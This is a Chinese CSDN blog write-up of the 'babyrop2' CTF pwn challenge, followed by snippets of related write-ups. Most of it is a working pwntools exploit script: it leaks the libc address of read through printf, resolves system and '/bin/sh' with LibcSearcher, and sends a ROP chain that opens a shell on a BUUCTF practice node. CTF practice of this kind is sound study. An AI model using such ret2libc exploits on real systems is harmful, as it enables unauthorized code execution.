babyrop2

最新推荐文章于 2023-11-20 14:10:40 发布
最新推荐文章于 2023-11-20 14:10:40 发布
阅读量140 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beaster1/article/details/115288715
版权
本文探讨了一次针对64位程序的栈溢出攻击,首先通过地址泄露定位目标函数,然后构建ROP链,最终发现flag隐藏在文件中。作者详细展示了使用pwn库和LibcSearcher进行动态链接库搜索和漏洞利用的步骤。
摘要由CSDN通过智能技术生成

本题checksec下是64位栈溢出

还是先进行地址泄露在构建rop链
思路跟之前做的libc泄露一样

唯一比较坑的是打通之后找不到flag 结果找不到 看了大佬的文章才知道是藏在文件中了

在这里插入图片描述

from pwn import *
from LibcSearcher import *

#p = process('./babyrop2')
p = remote('node3.buuoj.cn',27575)
elf = ELF('babyrop2')

pop_rdi = 0x400733
pop_rsi_r15 = 0x400731 
format_str = 0x400770  
ret_addr = 0x400734

printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_plt = elf.sym['main']

payload = 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)

p.sendline(payload)


read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#接收地址的你看看基本上是7个字节的,7f开头,补全8个字节

libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')

sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload = 'a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)
p.interactive()
bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 624
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
BUUCTF:bjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 939
BUUCTF:bjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
【BUUCTF - PWN】baby_rop2
古月浪子的博客
04-18 472
checksec一下,栈溢出 IDA打开看看,明显的栈溢出漏洞 题目给了libc文件,使用printf把read的got地址打印出来即可泄露libc地址,然后one_gadget拿shell from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 246
只开启了NX保护。
bjdctf_2020_babyrop2
、moddemod
07-06 588
注意这题开启了Canary 因为限制了payload长度就不可以写got表了,但是可以直接泄露Canary值,在vuln中进行栈溢出即可拿到shell… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bjdctf_2020_babyrop2' elf = ELF(proc_name) p = process(proc_name) p = remote('node3..
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 970
题时遇到了不少问题,有些还没有得到解决,在此进行记录
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1553
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
[OGeek2019]babyrop
m0_52231248的博客
11-02 122
题目Ubuntu16,libc2.23 Checksec一下,32位程序 Read很明显的溢出,但之前存在两个检查,strlen()在读入/x00后就会截断,同样我们给a1传入/xff来溢出buff(0xe7)。 Offest=0xe7+0x4 程序中没有puts函数但存在write和read函数也能达到相同作用泄露libc基址寻找我们要用的system函数和bin_sh字段。 构造rop链: p32(write_plt)+p32(main_addr)+p32(1)+p3
BUUCTF [OGeek2019]babyrop
weixin_45441024的博客
01-21 263
BUUCTF [OGeek2019]babyrop 首先我们还是check一下 对我们输入的值和随机数进行比较,这里我们需要知道strlen这个函数识别尾部的方式是\x00,所以这里我们可以通过在输入的一开始就加上’\x00’来绕过,这样v1就等于0了,就满足了这个条件 再找一下之后我们发现了可以执行libc的位置,这里的buf距离栈底有0xe7,但是通过read可以读到a1个字节(这个a1就是函数0x80487ef的返回值),所以只要我们输入一个特别大的值就可以进行溢出 ,剩下的就是常规操作ret
babyrop2 疑惑及解决
m0_48127441的博客
04-07 182
简单的rop题 通过printf泄露libc地址 然后找到libc基址,从而找到one_gadget地址 实现获得shell 疑惑点是 泄露printf地址时,不输出 泄露read地址数据正常
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 495
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
[HarekazeCTF2019]baby_rop2
z1r0的博客
12-07 907
[HarekazeCTF2019]baby_rop2 查看保护 有溢出,ret2libc即可。这里使用printf这个函数来泄露libc。 printf有两个参数。第一个用rdi来压参数。第二个用rsi来。泄露出libc之后,还是正常的rop。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
半岛铁盒的博客
08-12 681
64位,开了nx保护 运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’) 利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址 然后造成溢出,将返回地址覆盖为system(‘/bin/sh’) from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('n
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1708
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1269
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
【java毕业设计】应急救援物资管理系统源码(springboot+vue+mysql+说明文档).zip
11-06
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
基于java的音乐网站答辩PPT.pptx
11-06
基于java的音乐网站答辩PPT.pptx
基于Flexsim的公路交通仿真系统.zip
最新发布
11-06
基于Flexsim软件开发的仿真系统,可供参考学习使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值